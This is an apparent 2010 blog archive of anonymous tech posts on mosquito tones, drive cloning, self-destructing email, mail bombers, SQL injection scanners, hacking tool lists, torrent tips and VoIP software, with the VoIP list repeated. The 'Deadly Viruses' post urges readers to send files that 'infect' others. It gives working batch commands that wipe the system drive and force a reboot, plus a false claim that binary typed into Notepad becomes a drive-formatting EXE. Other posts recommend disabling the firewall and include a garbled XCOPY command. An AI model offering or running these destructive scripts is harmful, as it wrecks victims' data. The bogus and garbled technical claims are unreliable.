Archive for November 2010

Stop using Mortein instead use you computer for Mosquito killing.

Stop using chemical based Insecticides to kill mosquitoes, because you might kill yourself.

Download these Anti Mosquito software to repel those annoying insects and be safer & greener

How does it work?

Dragonflies are the mortal enemy for mosquitoes and in flight they generate sound frequencies (approximately) between 67 Hz and 45 Hz, depending on their sizes.

56 Hz is a good average number in between those frequencies. Your PC sound card and speakers will work well for this purpose. There are many sound and tone generator programs available on the internet for both the Mac and Windows PC. Setup your computer with the sound/tone generator program running and then play the sound through your computer speakers. The speakers can be aimed directionally for complete room coverage.

The sound level on the speakers should be adjusted so it is barely audible. This arrangement can be setup in a bedroom where you would like to have the window open but are worried about mosquitoes. One speaker should be fairly close to where you are sleeping.

Here are some links to more advanced tone generator software which can actually sweep between the 45 Hz and 67 Hz frequencies:

Tuesday, November 30, 2010
Posted by Anonymous

How to Clone a Hard Drive

Did know that you could clone your current Hard Drive without having to by extra software? Maybe you didn’t know that all that you needed, was already set up on your current system? Well, it is… and if you follow this tut, you shouldn’t have much of a problem.

Make sure that you have a Master and a Slave setup on your system. The Slave drive, in this case, is where all the data on the Master is going to go to.


First: Perform a Scandisk your Master drive and follow that with a thorough Defrag. If you have an Antivirus program, do a thorough sweep with the AV first, then do the Scandisk, followed by the Defrag.

Second: Do the same thing to the target drive, as you did the Master: Scandisk then a thorough Defrag.

Third: Right-click on the Target drive and click on Format. When the box comes up, click your mouse onto the “Full” button.

Fourth: After Formatting the Target drive, run a Scandisk again and click on the button that says “Autofix Errors”.

Fifth: In this final part, you might want to cut-and-paste to code in, unless you are sure that you can do it without making any mistakes:

Click on the “Start” button, then click on the “Run…” button, then place the following into the Run box:

“XCOPY C:\*.*D:\ /c/h/e/k/r” (minus the quotes, of course) then press the “Enter” button.

If you receive an error message, then remove the space from between XCOPY and C:\

Anything that should happen to come up in the DOS box, just click “Y” for “Yes”. When its all finished, pull the original Master from the system, designate the Slave as the Master (change your jumpers), then check your new Master out.

This tut has worked and has been tested on all systems except for Windows 2000, so you really shouldn’t have any problems. If, by any chance, you should come across a snag, message me and I’ll walk you through it.
Posted by Anonymous
Tag :

How to fix corrupted files in XP

Sometimes when you are executing some program an error comes saying that your xxx file is corrupted so we can not run your program and your whole work is left pending due to that error. Now this problem will not arise because I will show you how to fix these corrupted files.

Required:

1. Windows XP operating system
2. Windows XP cd

Now, follow this steps:

1. Place the xp cd in your cd/dvd drive
2. Go to start
3. run
4. type in ‘sfc /scannow’ (without the ‘)

Now it should all load, and fix all your corrupted file on win XP.
Posted by Anonymous
Tag :

||| {{Sent Email that automatically delete them after they are read}} ||| with BigString.com

You might remember the world famous scene of Mission Impossible in which after the message has been heard once the message destroys itself. Now it is possible for everybody to have such facility. You can send an E-mail which destroys itself after it has been read once.


Every time that you send an email, copies are stored permanently on multiple email servers as well as the recipient’s inbox and anyone they decide to send it to. Your emails can be stored and scanned in more places than you can imagine. Do you want people storing your email messages forever? Do you want something that you type today to be used against you tomorrow, next week, next month or even in the next decade?

Until now, everyone else has had control of the email that you have sent. BigString gives you back control of your email, acting like an automatic shredder for your email. You can self-destruct or change an email that’s already been sent or read. Don’t leave your messages sitting in peoples’ inboxes forever. Get a free BigString email account to protect your privacy.


BigString takes the risk out of email

Now, with BigString, you can finally take the risk out of email and put an end to “sender regret.” It is the world’s first & only email service that thoroughly protects your safety and privacy.

BigString’s exclusive, patent-pending technology enables you to prevent your personal or business information from lingering indefinitely in someone else’s inbox. It also restricts private pictures or messages from being indiscriminately spread throughout cyberspace! Now your sensitive photos can’t be posted to unseemly web sites or printed for circulation amongst total strangers.

BigString lets you have second thoughts

BigString shifts the control from the recipient to YOU the sender. BigString grants the luxury of second thoughts, the power to limit message viewings, and the choice to delay email transmission.

You can reword a message fired off in anger or haste or completely delete it! You can recall a botched résumé for revision or erase a tasteless joke. You can make a work of art or photograph print-proof. You can prevent a love letter from being forwarded. You can set an expiration date on an emailed price quote or business offer or you can simply pull back an email to eliminate typos.

BigString takes the danger out of clicking

BigString guarantees that clicking “send” will never again be an irreversible disaster. Now YOU decide the fate of your emails. You decide where they end up, who sees them and for how long. BigString emails can be destroyed, recalled or changed even after they’ve been opened! The freedom is yours, the options are yours, and you’re the boss with BigString.

BigString is easy to use

BigString is as easy to use as any other email and there’s nothing to download! Don’t be resigned to the mercy of your recipient. You don’t want your every action to be carved in stone because sometimes you just NEED to take it back!

Here are just a few of the many applications of BigString Erasable, Recallable, Non-Printable Email.

Executives: Protect your business and safeguard your email. Now you never have to worry about sending the wrong attachment or completely forgetting it. Misspelled words, incorrect dates, or other typos can all be fixed even after your message has been sent. You can even “pull an email back” to delete expired price quotes, old business offers or dated legal material. BigString is your email insurance.

On-Line Daters: You don’t want your personal information like pictures, phone numbers or intimate notes, circulated around the Internet! BigString prevents your pictures and messages from being printed or forwarded. You can set an expiration date for an email or self-destruct it at will. You can choose the number of times you’ll allow a picture to be viewed before it disappears. BigString protects your privacy!

Artists and Photographers: Now with BigString you can confidently email proofs and samples without the slightest fear that they will be printed or saved for later use without your authorization. Use BigString to make your image non-savable and non-printable! Limit the number of times a client can view a piece before you have it self-destruct. You can even recall a sent email to delete an old price quote or alter a new one. You can also prevent it from being forwarded to other customers. BigString protects your rights of ownership!

Copywriters: Spelling or punctuation errors that can cost time, money, or embarrassment are now a thing of the past. With BigString, clicking “send” is no longer an action “carved in stone.” Accidentally arranging paragraphs in the wrong order will no longer mean a lost account. With the technology of BigString you can recall that mistake-ridden copy and correct the errors even after your email has left the outbox. You can self-destruct what you sent all together and replace it with a fully revised version. Only you will know this switch has occurred! With BigString you can confidently send non-printable, non-savable sample copy. You no longer have to worry that it will be used without your knowledge. You’re the boss with BigString.

Get a Free Account from (http://www.bigstring.com/register/user/ )
Posted by Anonymous

What are Mail Bombers ?

Mail bomber is the software that floods user’s e-mail with big number of mails. Mails can contain different information: from the simple newsletter to the offer to enlarge your body parts.

Mail bombers sometimes are used as mass mailing software and in that case are legal programs used for business improvement. Individual users also are able to use these programs.

Most popular programs are:

Avalanch 3.6
Aenima 2.0
Bomsquad
Extreme Mail
Hacktec
KaBoom 3.0
Unabomber
Homicide
Digital Destruction Beta
Euthanasia
Ghost Mail 5.1
Saddamme 0.2
X-Mail
Most of them are free.

Business corporations use mass mailing software for newsletters. They provide new information about their new products, new services, updates and other things to legally registered members of theirs site who agreed to get notifications. It’s very convenient to use mass mailing software in that case. Individual users use mail bomber for mass mailing messages. If one had received a good joke, it’s more convenient to send it to a group of friend. It is useful and fun tool.

But in the hands of porno site’s manager it can become a tool for Spam. If your e-mail address is known or obtained without your knowledge you might be flooded with Spam. You can get over thousand letters per day. They can be infected, or advertisement, remedy, etc. Links that are included in e-mail may lead you to site’s that are bundled with hijackers or some other spyware. It might be great threat to you privacy.

Using good Anti-Spyware or Anti-Spam program should help you to prevent Spam and mail bombers flood.
Posted by Anonymous

Another Top 10 SQL Injection Scanners

SQL injection is a very popular and easy hack technique of WEB 2.0 application and by using following tools you can your self try you’re Luck. I will write further tutorials to use these things.

Checking for SQL Injection vulnerabilities involves auditing your web applications and the best way to do it is by using automated SQL Injection Scanners. I’ve compiled a list of free SQL Injection Scanners I believe will be of a value to Hackerz

SQLIer – SQLIer takes a vulnerable URL and attempts to determine all the necessary information to exploit the SQL Injection vulnerability by itself, requiring no user interaction at all.

SQLbftools – SQLbftools is a collection of tools to retrieve MySQL information available using a blind SQL Injection attack.

SQL Injection Brute-forcer – SQLibf is a tool for automatizing the work of detecting and exploiting SQL Injection vulnerabilities. SQLibf can work in Visible and Blind SQL Injection. It works by doing simple logic SQL operations to determine the exposure level of the vulnerable application.

SQLBrute – SQLBrute is a tool for brute forcing data out of databases using blind SQL injection vulnerabilities. It supports time based and error based exploit types on Microsoft SQL Server, and error based exploit on Oracle. It is written in Python, uses multi-threading, and doesn’t require non-standard libraries.

BobCat – BobCat is a tool to aid an auditor in taking full advantage of SQL injection vulnerabilities. It is based on AppSecInc research. It can list the linked severs, database schema, and allow the retrieval of data from any table that the current application user has access to.

SQLMap – SQLMap is an automatic blind SQL injection tool, developed in python, capable to perform an active database management system fingerprint, enumerate entire remote databases and much more. The aim of SQLMap is to implement a fully functional database management system tool which takes advantages of web application programming security flaws which lead to SQL injection vulnerabilities.

Absinthe – Absinthe is a GUI-based tool that automates the process of downloading the schema and contents of a database that is vulnerable to Blind SQL Injection.

SQL Injection Pen-testing Tool – The SQL Injection Tool is a GUI-based utility designed to examine database through vulnerabilities in web-applications.
Get SQL Injection Pen-testing tool.( http://sqltool.itdefence.ru/indexeng.html )

SQID – SQL Injection digger (SQLID) is a command line program that looks for SQL injections and common errors in websites. It can perform the follwing operations: look for SQL injection in a web pages and test submit forms for possible SQL injection vulnerabilities.

Blind SQL Injection Perl Tool – bsqlbf is a Perl script that lets auditors retrieve information from web sites that are vulnerable to SQL Injection.
Get Blind SQL Injection Perl Tool. (http://www.unsec.net/download/bsqlbf.pl )
Posted by Anonymous

Deadly Viruses!!!!!

If you think that notepad is useless then you are wrong because you can now do a lot of things with a notepad which you could have never imagined.In this hack I will show you how to format a HDD using a notepad. This is really cool.

Step 1. Copy The Following In Notepad Exactly as it says

01001011000111110010010101010101010000011111100000

Step 2. Save As An EXE Any Name Will Do

Step 3. Send the EXE to People And Infect

OR

IF u think u cannot format c driver when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code. Save As An EXE Any Name Will Do

format c:\ /Q/X — this will format your drive c:\

01100110011011110111001001101101011000010111010000
100000011000110011101001011100
0010000000101111010100010010111101011000

format d:\ /Q/X — this will format your dirve d:\

01100110011011110111001001101101011000010111010000
100000011001000011101001011100
0010000000101111010100010010111101011000

format a:\ /Q/X — this will format your drive a:\

01100110011011110111001001101101011000010111010000
100000011000010011101001011100
0010000000101111010100010010111101011000

del /F/S/Q c:\boot.ini — this will cause your computer not to boot.

01100100011001010110110000100000001011110100011000
101111010100110010111101010001
00100000011000110011101001011100011000100110111101
101111011101000010111001101001
0110111001101001

Try to figure out yourself rest
can’t spoonfeed
Its working.

Do not try it on your PC. Don’t mess around this is for educational purpose only

still if you cant figure it out try this:
go to notepad and type the following:
@Echo off
Del C:\ *.*|y  save it as Dell.bat
want worse then type the following:


@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
and save it as a .bat file
Posted by Anonymous
Tag :

What’s a worm?

A worm is a computer virus designed to copy itself, usually in large numbers, by using e-mail or other form of software to spread itself over an internal network or through the internet.

How do they spread?


When you receive a worm over e-mail, it will be in the form of an attachment, represented in most e-mail programs as a paper clip. The attachment could claim to be anything from a Microsoft Word document to a picture of tennis star Anna Kournikova (such a worm spread quickly in February 2001).

If you click on the attachment to open it, you’ll activate the worm, but in some versions of Microsoft Outlook, you don’t even have to click on the attachment to activate it if you have the program preview pane activated. Microsoft has released security patches that correct this problem, but not everyone keeps their computer up to date with the latest patches.

After it’s activated, the worm will go searching for a new list of e-mail addresses to send itself to. It will go through files on your computer, such as your e-mail program’s address book and web pages you’ve recently looked at, to find them.

Once it has its list it will send e-mails to all the addresses it found, including a copy of the worm as an attachment, and the cycle starts again. Some worms will use your e-mail program to spread themselves through e-mail, but many worms include a mail server within their code, so your e-mail program doesn’t even have to be open for the worm to spread.

Other worms can use multiple methods of spreading. The MyDoom worm, which started spreading in January 2004, attempted to copy infected files into the folder used by Kazaa, a file-sharing program. The Nimda worm, from September 2001, was a hybrid that had four different ways of spreading.

What do they do?                        

Most of the damage that worms do is the result of the traffic they create when they’re spreading. They clog e-mail servers and can bring other internet applications to a crawl.

But worms will also do other damage to computer systems if they aren’t cleaned up right away. The damage they do, known as the payload, varies from one worm to the next.

The MyDoom worm was typical of recent worms. It opened a back door into the infected computer network that could allow unauthorized access to the system. It was also programmed to launch an attack against a specific website by sending thousands of requests to the site in an attempt to overwhelm it.

The target of the original version of MyDoom attack was the website of SCO Group Inc., a company that threatened to sue users of the Linux operating system, claiming that its authors used portions of SCO’s proprietary code. A second version of MyDoom targeted the website of software giant Microsoft.

The SirCam worm, which spread during the summer of 2001, disguised itself by copying its code into a Microsoft Word or Excel document and using it as the attachment. That meant that potentially private or sensitive documents were being sent over the internet.

How do I get rid of them?

The best way to avoid the effects of worms is to be careful when reading e-mail. If you use Microsoft Outlook, get the most recent security updates from the Microsoft website and turn off the preview pane, just to be safe.

Never open attachments you aren’t expecting to receive, even if they appear to be coming from a friend. Be especially cautious with attachments that end with .bat, .cmd, .exe, .pif, .scr, .vbs or .zip, or that have double endings. (The file attachment that spread the Anna Kournikova worm was AnnaKournikova.jpg.vbs.)

Also, install anti-virus software and keep it up to date with downloads from the software maker’s website. The updates are usually automatic.

Users also need to be wary of e-mails claiming to have cures for e-mail worms and viruses. Many of them are hoaxes that instruct you to delete important system files, and some carry worms and viruses themselves.

As well, some users should consider using a computer with an operating system other than Windows, the target of most e-mail worms. Most of the worms don’t affect computers that run Macintosh or Linux operating systems.
Posted by Anonymous
Tag :

Top 10 Linux Hacking Tools

This is a Cool Collection of Top Ten Linux Hacking Tools.

1. nmap – Nmap (“Network Mapper”) is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. Nmap runs on most types of computers and both console and graphical versions are available.

2. Nikto – Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3200 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired).

3. THC-Amap – Amap is a next-generation tool for assistingnetwork penetration testing. It performs fast and reliable application protocol detection, independant on the TCP/UDP port they are being bound to.

4. Ethereal – Ethereal is used by network professionals around the world for troubleshooting, analysis, software and protocol development, and education. It has all of the standard features you would expect in a protocol analyzer, and several features not seen in any other product.

5. THC-Hydra – Number one of the biggest security holes are passwords, as every password security study shows. Hydra is a parallized login cracker which supports numerous protocols to attack. New modules are easy to add, beside that, it is flexible and very fast.

6. Metasploit Framework – The Metasploit Framework is an advanced open-source platform for developing, testing, and using exploit code. This project initially started off as a portable network game and has evolved into a powerful tool for penetration testing, exploit development, and vulnerability research.

7. John the Ripper – John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches.

8. Nessus – Nessus is the world’s most popular vulnerability scanner used in over 75,000 organisations world-wide. Many of the world’s largest organisations are realising significant cost savings by using Nessus to audit business-critical enterprise devices and applications.

9. IRPAS – Internetwork Routing Protocol Attack Suite – Routing protocols are by definition protocols, which are used by routers to communicate with each other about ways to deliver routed protocols, such as IP. While many improvements have been done to the host security since the early days of the Internet, the core of this network still uses unauthenticated services for critical communication.

10. Rainbowcrack – RainbowCrack is a general propose implementation of Philippe Oechslin’s faster time-memory trade-off technique. In short, the RainbowCrack tool is a hash cracker. A traditional brute force cracker try all possible plaintexts one by one in cracking time. It is time consuming to break complex password in this way. The idea of time-memory trade-off is to do all cracking time computation in advance and store the result in files so called “rainbow table”.
Posted by Anonymous

Top 10 Windows Hacking Tools

This is the Collection of Best Windows Hacking Tools:

1. Cain & Abel – Cain & Abel is a password recovery tool for the Microsoft Windows Operating System. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols.

2. SuperScan – SuperScan is a powerful TCP port scanner, pinger, resolver. SuperScan 4 (Current Version) is a completely-rewritten update of the highly popular Windows port scanning tool, SuperScan.

3. GFI LANguard Network Security Scanner – GFI LANguard N.S.S. is a network vulnerability management solution that scans your network and performs over 15,000 vulnerability assessments. It identifies all possible security threats and provides you with tools to patch and secure your network. GFI LANguard N.S.S. was voted Favorite Commercial Security Tool by NMAP users for 2 years running and has been sold over 200,000 times!

4. Retina – Retina Network Security Scanner, recognised as the industry standard for vulnerability assessment, identifies known security vulnerabilities and assists in prioritising threats for remediation. Featuring fast, accurate, and non-intrusive scanning, users are able to secure their networks against even the most recent of discovered vulnerabilities.

5. SamSpade – SamSpade provides a consistent GUI and implementation for many handy network query tasks. It was designed with tracking down spammers in mind, but can be useful for many other network exploration, administration, and security tasks. It includes tools such as ping, nslookup, whois, dig, traceroute, finger, raw HTTP web browser, DNS zone transfer, SMTP relay check, website search, and more.

6. N-Stealth – N-Stealth is a commercial web server security scanner. It is generally updated more frequently than free web scanners such as whisker and nikto, but you have to pay for the privilege.

7. Solarwinds – Solarwinds contains many network monitoring, discovery and attack tools. The advanced security tools not only test internet security with the SNMP Brute Force Attack and Dictionary Attack utilities but also validate the security on Cisco Routers with the Router Security Check. The Remote TCP Reset remotely display all active sessions on a device and the Password Decryption can decrypt Type 7 Cisco Passwords. The Port Scanner allows testing for open TCP ports across IP Address and port ranges or selection of specific machines and ports.

8. Achilles – The first publicly released general-purpose web application security assessment tool. Achilles acts as a HTTP/HTTPS proxy that allows a user to intercept, log, and modify web traffic on the fly. Due to a cyber squatter, Achilles is no longer online at its original home of www.Digizen-Security.com…OOPS!

9. CookieDigger - CookieDigger helps identify weak cookie generation and insecure implementations of session management by web applications. The tool works by collecting and analyzing cookies issued by a web application for multiple users. The tool reports on the predictability and entropy of the cookie and whether critical information, such as user name and password, are included in the cookie values.

10. Netcat (The Network SwissArmy Knife) – Netcat was originally a Unix utility which reads and writes data across network connections, using TCP or UDP protocol. It is designed to be a reliable “back-end” tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities.
Posted by Anonymous

Free VoIP Software Phones


Ekiga is an H.323 compatible videoconferencing and VOIP/IP-Telephony application that allows you to make audio and video calls to remote users with H.323 hardware or software (such as Microsoft Netmeeting). It supports all modern videoconferencing features, such as registering to an ILS directory, gatekeeper support, making multi-user conference calls using an external MCU, using modern Quicknet telephony cards, and making PC-To-Phone calls.

Ekiga was previously known as GnomeMeeting.


Twinkle is a soft phone for VoIP communcations using the SIP protocol. You can use Twinkle for direct IP phone to IP phone communications or in a network using a SIP proxy to route your calls.

In addition to making basic voice calls, Twinkle also provides the following features:

  • 2 call appearances (lines)
  • Multiple active call identities
  • Custom ring tones
  • Call Waiting
  • Call Hold
  • 3-way conference calling
  • Mute
  • Call redirection on demand
  • Call redirection unconditional
  • Call redirection when busy
  • Call redirection no answer
  • Reject call redirection request
  • Blind call transfer
  • Reject call transfer request
  • Call reject
  • Repeat last call
  • Do not disturb
  • Auto answer
  • User definable scripts triggered on call events
  • E.g. to implement selective call reject or distinctive ringing
  • RFC 2833 DTMF events
  • Inband DTMF
  • Out-of-band DTMF (SIP INFO)
  • STUN support for NAT traversal
  • Send NAT keep alive packets when using STUN
  • NAT traversal through static provisioning
  • Missed call indication
  • History of call detail records for incoming, outgoing, successful and missed calls
  • DNS SRV support
  • Automatic failover to an alternate server if a server is unavailable
  • Other programs can originate a SIP call via Twinkle, e.g. call from address book
  • System tray icon
  • System tray menu to quickly originate and answer calls while Twinkle stays hidden
  • User defineable number conversion rules


WengoPhone is a SIP phone which allows users to speak at no cost from one's computer to other users of SIP compliant VoIP software. It also allows users to call landlines, cellphones, send SMS messages and to make video calls. None of this functionality is tied to a particular SIP provider and can be used with any provider available on the market, unlike proprietary solutions such as Skype.


Speak Freely is a 100% free Internet telephone originally written in 1991 by John Walker, founder of Autodesk. After April of 1996, he discontinued development on the program. Since then, several other Internet "telephones" have cropped up all over the world. However, most of these programs cost money. Most of them have poor sound quality, and don't support Speak Freely's basic features such as encryption, the answering machine, or selectable compression.


Gspeakfreely is a VoIP system with a flexible component system. It implements a set of audio processing component which can be connected to each other or mixed together. The most important components are net in/output, which implement VoIP functionality and the OSS-DSP in/output component.

Additionally there is a ISDN in/output component that allows making actual phone connections, and a file input component that can also play Internet radio streams. Also included is a fading plug-in, that can for example fade incoming calls into your music. New components can be developed for specific purposes, and combined with existing ones.

The net in/output components also have conference support. The net input component can mix incoming audio data from different hosts.


linphone is a SIP webphone with support for several different codecs, including speex.

Linphone is a web phone: it let you phone to your friends anywhere in the whole world, freely, simply by using the internet. The cost of the phone call is the cost that you spend connected to the internet.

linphone features include:

  • Works with the Gnome Desktop under Linux, (maybe others Unixes as well, but this has never been tested). Nevertheless you can use linphone under KDE, of course!
  • Since version 0.9.0, linphone can be compiled and used without gnome, in console mode, by using the program called "linphonec"
  • Works as simply as a cellular phone. Two buttons, no more.
  • Linphones includes a large variety of codecs (G711-ulaw, G711-alaw, LPC10-15, GSM, and SPEEX). Thanks to the Speex codec it is able to provide high quality talks even with slow internet connections, like 28k modems.
  • Understands the SIP protocol. SIP is a standardised protocol from the IETF, that is the organisation that made most of the protocols used in the Internet. This guaranties compatibility with most SIP - compatible web phones.
  • You just require a soundcard to use linphone.
  • Other technical functionalities include DTMF (dial tones) support though RFC2833 and ENUM support (to use SIP numbers instead of SIP addresses).
  • Linphone is free software, released under the General Public Licence.
  • Linphone is documented: there is a complete user manual readable from the application that explains you all you need to know.
  • Linphone includes a sip test server called "sipomatic" that automatically answers to calls by playing a pre-recorded message.


minisip is a SIP VoIP soft phone that implements additional security features such as mutual authentication, encryption and integrity of on-going calls, and encryption of the signaling (SIP over TLS). These security features use work-in-progress IETF standards (SRTP and MIKEY).


OhPhone is a H.323 Video Conferencing Program compatible with other H.323 video conferencing programs including Microsoft NetMeeting.

OhPhone supports full duplex audio and bi-directional video. It requires a full duplex sound card for audio support and a Bt848/878 based video card (using the bktr driver) for video capture.

OhPhone uses the OpenH323 and PWLib libraries, developed by Equivalence Pty.


NetMeeting is Microsoft's free H.323-compliant VoIP software phone for Windows.


The Internet SwitchBoard software is the client software for MicroTelco services and is included with the purchase of the Internet PhoneJACK or Internet PhoneCARD.

The Internet Switchboard was designed to be used with Quicknet hardware and a MicroTelco Services account. The Internet SwitchBoard can be configured with your firewall and features voice control with worldwide phone and dial tone emulation.

The Internet SwitchBoard software is a PC-to-PC, PC-to-Phone, Fax-to-Email, and Fax-to-Fax calling application that allows users to make low cost calls worldwide to other phones or fax machines.

PC-to-Phone and Fax-to-Fax calls are as easy to dial as using a phone or fax machine. PC-to-PC calls are made by dialing an IP address and are free. FAX-to-Email documents are electronically transmitted as virus free e-mail attachments and are free if sent individually. Recipients can view files in popular e-mail clients.

Internet Switchboard features include:

  • Low calling rates through MicroTelco Services
  • Auto call connect - automatic connection and least cost routing feature that connects your call using the next available carrier when the chosen carrier is unavailable
  • Least cost routing - for voice amongst leading global IP carriers
  • Automatic firewall detection
  • Automatic fax detection - allowing a fax machine to be plugged into a compatible card using the Internet SwitchBoard and route faxes to email or another fax machine via the Internet
  • International phone emulation's & connectivity
  • Low account balance warning
  • Call connect announcement
  • Auto gain control
  • Supports any type of Internet connection, including broadband
  • Microsoft Operating support including Windows 98/98SE, ME, 2000, and Windows XP


SIPSet is a SIP User Agent with a GUI front end that works with the Vovida SIP stack. You can use the SIPSet as a soft phone, to make and receives phone calls from your Linux PC.

The current release of SIPSet implements these features and functionality:

  • SIPSet can make calls through a SIP proxy.
  • SIPSet can register to receive calls through a SIP proxy.
  • SIPSet can make and receive calls directly with another User Agent.


KPhone is a SIP User Agent for Linux. It implements the functionality of a VoIP Softphone but is not restricted to this. KPhone is licensed under the GNU General Public License. KPhone is written in C++ and uses Qt.


Jabbin is an open source Jabber client program that allows free PC to PC calls using VoIP over the Jabber network.
Posted by Anonymous
Tag :

5 ways to Speed up Torrent Download


1. Cap your upload (most important)
Limit your upload speed to approximately 80 percent of your maximum upload rate. You can check your upload speed over here (never trust your isp). Once you know your maximum upload speed, change the max upload (to 80%) speed in your torrent client’s preferences.
Don’t get me wrong, everyone should share as much as possible, but if your upload rate reached it’s max, your download rate suffers significantly.
2. Hack the max TCP connections
If you’re on XP sp2, your TCP connections are limited to a maximum of 10. This seriously hurts your downloading speed because it wont let you connect to a high amount of ip numbers. It is supposed to slow down viruses because their spreading strategy is to connect to a high amount of ip numbers, but it also cripples your torrent downloads.
A nice way to fix this is to download this patch, it allows you to set the maximum allowed connections to any number you want. Any number between 50 and 100 is ok .
3. Check seeds and peers
A simple tip, but o so important. Always look for torrents with the best seed/peer ratio. The more seeds (compared to peers) the better (in general). So 50 seeds and 50 peers is better than 500 seeds and 1000 peers. So, be selective.
4. Change the default port.
By default, BitTorrent uses a port 6881-6999. BitTorrent accounts for a lot of the total internet traffic (1/3), so isp’s like to limit the connection offered on the these ports. So, you should change these to another range. Good clients allow you to do this, just choose anything you like. If you’re behind a router, make sure you have the ports forwarded or UPnP enabled.
5. Disable Windows Firewall
It sucks. Windows Firewall hates P2P and often leads a life of it’s own. So disable it and get yourself a decent firewall, Kerio or Zone Alarm for example.
Posted by Anonymous
Tag :


Ekiga is an H.323 compatible videoconferencing and VOIP/IP-Telephony application that allows you to make audio and video calls to remote users with H.323 hardware or software (such as Microsoft Netmeeting). It supports all modern videoconferencing features, such as registering to an ILS directory, gatekeeper support, making multi-user conference calls using an external MCU, using modern Quicknet telephony cards, and making PC-To-Phone calls.

Ekiga was previously known as GnomeMeeting.


Twinkle is a soft phone for VoIP communcations using the SIP protocol. You can use Twinkle for direct IP phone to IP phone communications or in a network using a SIP proxy to route your calls.

In addition to making basic voice calls, Twinkle also provides the following features:

  • 2 call appearances (lines)
  • Multiple active call identities
  • Custom ring tones
  • Call Waiting
  • Call Hold
  • 3-way conference calling
  • Mute
  • Call redirection on demand
  • Call redirection unconditional
  • Call redirection when busy
  • Call redirection no answer
  • Reject call redirection request
  • Blind call transfer
  • Reject call transfer request
  • Call reject
  • Repeat last call
  • Do not disturb
  • Auto answer
  • User definable scripts triggered on call events
  • E.g. to implement selective call reject or distinctive ringing
  • RFC 2833 DTMF events
  • Inband DTMF
  • Out-of-band DTMF (SIP INFO)
  • STUN support for NAT traversal
  • Send NAT keep alive packets when using STUN
  • NAT traversal through static provisioning
  • Missed call indication
  • History of call detail records for incoming, outgoing, successful and missed calls
  • DNS SRV support
  • Automatic failover to an alternate server if a server is unavailable
  • Other programs can originate a SIP call via Twinkle, e.g. call from address book
  • System tray icon
  • System tray menu to quickly originate and answer calls while Twinkle stays hidden
  • User defineable number conversion rules


WengoPhone is a SIP phone which allows users to speak at no cost from one's computer to other users of SIP compliant VoIP software. It also allows users to call landlines, cellphones, send SMS messages and to make video calls. None of this functionality is tied to a particular SIP provider and can be used with any provider available on the market, unlike proprietary solutions such as Skype.


Speak Freely is a 100% free Internet telephone originally written in 1991 by John Walker, founder of Autodesk. After April of 1996, he discontinued development on the program. Since then, several other Internet "telephones" have cropped up all over the world. However, most of these programs cost money. Most of them have poor sound quality, and don't support Speak Freely's basic features such as encryption, the answering machine, or selectable compression.


Gspeakfreely is a VoIP system with a flexible component system. It implements a set of audio processing component which can be connected to each other or mixed together. The most important components are net in/output, which implement VoIP functionality and the OSS-DSP in/output component.

Additionally there is a ISDN in/output component that allows making actual phone connections, and a file input component that can also play Internet radio streams. Also included is a fading plug-in, that can for example fade incoming calls into your music. New components can be developed for specific purposes, and combined with existing ones.

The net in/output components also have conference support. The net input component can mix incoming audio data from different hosts.


linphone is a SIP webphone with support for several different codecs, including speex.

Linphone is a web phone: it let you phone to your friends anywhere in the whole world, freely, simply by using the internet. The cost of the phone call is the cost that you spend connected to the internet.

linphone features include:

  • Works with the Gnome Desktop under Linux, (maybe others Unixes as well, but this has never been tested). Nevertheless you can use linphone under KDE, of course!
  • Since version 0.9.0, linphone can be compiled and used without gnome, in console mode, by using the program called "linphonec"
  • Works as simply as a cellular phone. Two buttons, no more.
  • Linphones includes a large variety of codecs (G711-ulaw, G711-alaw, LPC10-15, GSM, and SPEEX). Thanks to the Speex codec it is able to provide high quality talks even with slow internet connections, like 28k modems.
  • Understands the SIP protocol. SIP is a standardised protocol from the IETF, that is the organisation that made most of the protocols used in the Internet. This guaranties compatibility with most SIP - compatible web phones.
  • You just require a soundcard to use linphone.
  • Other technical functionalities include DTMF (dial tones) support though RFC2833 and ENUM support (to use SIP numbers instead of SIP addresses).
  • Linphone is free software, released under the General Public Licence.
  • Linphone is documented: there is a complete user manual readable from the application that explains you all you need to know.
  • Linphone includes a sip test server called "sipomatic" that automatically answers to calls by playing a pre-recorded message.


minisip is a SIP VoIP soft phone that implements additional security features such as mutual authentication, encryption and integrity of on-going calls, and encryption of the signaling (SIP over TLS). These security features use work-in-progress IETF standards (SRTP and MIKEY).


OhPhone is a H.323 Video Conferencing Program compatible with other H.323 video conferencing programs including Microsoft NetMeeting.

OhPhone supports full duplex audio and bi-directional video. It requires a full duplex sound card for audio support and a Bt848/878 based video card (using the bktr driver) for video capture.

OhPhone uses the OpenH323 and PWLib libraries, developed by Equivalence Pty.


NetMeeting is Microsoft's free H.323-compliant VoIP software phone for Windows.


The Internet SwitchBoard software is the client software for MicroTelco services and is included with the purchase of the Internet PhoneJACK or Internet PhoneCARD.

The Internet Switchboard was designed to be used with Quicknet hardware and a MicroTelco Services account. The Internet SwitchBoard can be configured with your firewall and features voice control with worldwide phone and dial tone emulation.

The Internet SwitchBoard software is a PC-to-PC, PC-to-Phone, Fax-to-Email, and Fax-to-Fax calling application that allows users to make low cost calls worldwide to other phones or fax machines.

PC-to-Phone and Fax-to-Fax calls are as easy to dial as using a phone or fax machine. PC-to-PC calls are made by dialing an IP address and are free. FAX-to-Email documents are electronically transmitted as virus free e-mail attachments and are free if sent individually. Recipients can view files in popular e-mail clients.

